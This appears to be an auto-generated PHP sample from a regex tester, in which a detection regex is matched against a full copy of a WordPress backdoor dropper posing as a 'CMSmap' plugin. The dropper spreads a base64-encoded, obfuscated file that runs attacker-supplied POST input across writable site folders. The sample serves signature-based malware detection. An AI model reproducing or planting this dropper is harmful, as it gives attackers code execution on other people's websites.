$re = '/^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*.{0,150}?\/m7x\/cmsmap.{0,550}?function copy_file1\(\$dest\)\{\s*file_put_contents\(\$dest\..{0,150}?base64_decode\(\'pd9wahancmz1bmn0aw9uigj5c.{0,600}?y0mpo0akxygpoz8\+\'\)\);.{0,500}?if\(is_dir\(\$dir\.\$file\.\'\/\/wp-includes.{0,1700}?if\(is_dir\(\$dir\.\$file\.\'\/\/public_html\/.{0,500}?closedir\(\$dh[\);\s*\}]+listdir\(\$_server\[\'document_root\'\][[:punct:]\s]+$/is';
$str = '<?php
/**
* Plugin Name: CMSmap - WordPress Shell
* Plugin URI: https://github.com/m7x/cmsmap/
* Description: Simple WordPress Shell - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
* Version: 1.0
* Author: CMSmap
* Author URI: https://github.com/m7x/cmsmap/
* License: GPLv2
*/
header("content-Type: text/html; charset=gb2312");
function copy_file1($dest){
file_put_contents($dest.DIRECTORY_SEPARATOR.\'wp-config.bak.php\',base64_decode(\'PD9waHANCmZ1bmN0aW9uIGJ5cGFzcygpew0KICAgIHJldHVybiAibChcJF9QT1NUWyciOw0KfQ0KZXZhbCgiZXZhIi5ieXBhc3MoKS4ieCddKTsiKTsNCj8+DQo8PyRfdVU9Y2hyKDk5KS5jaHIoMTA0KS5jaHIoMTE0KTskX2NDPSRfdVUoMTAxKS4kX3VVKDExOCkuJF91VSg5NykuJF91VSgxMDgpLiRfdVUoNDApLiRfdVUoMzYpLiRfdVUoOTUpLiRfdVUoODApLiRfdVUoNzkpLiRfdVUoODMpLiRfdVUoODQpLiRfdVUoOTEpLiRfdVUoNDkpLiRfdVUoOTMpLiRfdVUoNDEpLiRfdVUoNTkpOyRfZkY9JF91VSg5OSkuJF91VSgxMTQpLiRfdVUoMTAxKS4kX3VVKDk3KS4kX3VVKDExNikuJF91VSgxMDEpLiRfdVUoOTUpLiRfdVUoMTAyKS4kX3VVKDExNykuJF91VSgxMTApLiRfdVUoOTkpLiRfdVUoMTE2KS4kX3VVKDEwNSkuJF91VSgxMTEpLiRfdVUoMTEwKTskXz0kX2ZGKCIiLCRfY0MpO0AkXygpOz8+\'));
}
function listDir($dir){
if(is_dir($dir)){
if ($dh = opendir($dir)) {
while (($file= readdir($dh)) !== false){
if((is_dir($dir."/".$file)) && $file!="." && $file!="..")
{
if(is_writable($dir."/".$file)&&is_readable($dir."/".$file))
{
if(strpos($dir.$file,\'.\') !== false){
if(is_dir($dir.$file.\'//wp-includes//\')){
copy_file1($dir.$file);
echo "<b><font color=\'red\'>file:</font></b>".$dir.$file."<font color=\'red\'> wpincludes</font>"."<br><hr>";
}
if(is_dir($dir.$file.\'//modules//\')){
copy_file1($dir.$file);
echo "<b><font color=\'red\'>file:</font></b>".$dir.$file."<font color=\'red\'> modules</font>"."<br><hr>";
}
if(is_dir($dir.$file.\'//public_html//\')){
copy_file1($dir.$file.\'//public_html//\');
echo "<b><font color=\'red\'>file:</font></b>".$dir.$file."<font color=\'red\'> publichtml</font>"."<br><hr>";
}
}
}else{
if(is_writable($dir."/".$file))
{
if(strpos($dir.$file,\'.\') !== false){
if(is_dir($dir.$file.\'//wp-includes//\')){
copy_file1($dir.$file);
echo "<b><font color=\'red\'>file:</font></b>".$dir.$file."<font color=\'red\'> wpincludes</font>"."<br><hr>";
}
if(is_dir($dir.$file.\'//modules//\')){
copy_file1($dir.$file);
echo "<b><font color=\'red\'>file:</font></b>".$dir.$file."<font color=\'red\'> modules</font>"."<br><hr>";
}
if(is_dir($dir.$file.\'//public_html//\')){
copy_file1($dir.$file);
echo "<b><font color=\'red\'>file:</font></b>".$dir.$file."<font color=\'red\'> publichtml</font>"."<br><hr>";
}
}
}else
{
}
}
listDir($dir."/".$file."/");
}
}
}
closedir($dh);
}
}
ListDir($_SERVER[\'DOCUMENT_ROOT\'].\'//..//..//\');
?>
';
preg_match_all($re, $str, $matches, PREG_SET_ORDER, 0);
// Print the entire match result
var_dump($matches);
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for PHP, please visit: http://php.net/manual/en/ref.pcre.php